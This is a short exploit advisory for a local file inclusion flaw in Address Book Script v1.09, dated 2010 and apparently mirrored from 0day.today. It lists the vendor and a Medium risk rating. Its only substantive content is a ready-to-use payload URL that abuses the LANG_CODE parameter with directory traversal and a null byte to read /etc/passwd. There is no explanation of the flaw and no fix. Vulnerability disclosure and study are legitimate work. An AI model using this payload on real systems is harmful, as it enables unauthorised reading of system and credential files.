id: 11300
date: 03/15/2010
title: Address Book Script v 1.09 - Local File Inclusion
author: Pouya Daneshmand
cves: 

===============================================================
Address Book Script v 1.09 - Local File Inclusion Vulnerability
===============================================================

#################################################################
# Application Info:
# Name: Address Book Script
# Version: 1.9
# Vendor: http://www.phpkobo.com/address_book.php
#################################################################
# Vulnerability Info:
# Type: Local File Inclusion
# Risk: Medium
#################################################################
Vulnerability:
http://site.com/codelib/cfg/common.inc.php?LANG_CODE=../../../../../../etc/passwd%00
 
#################################################################



#  0day.today [2023-03-23]  #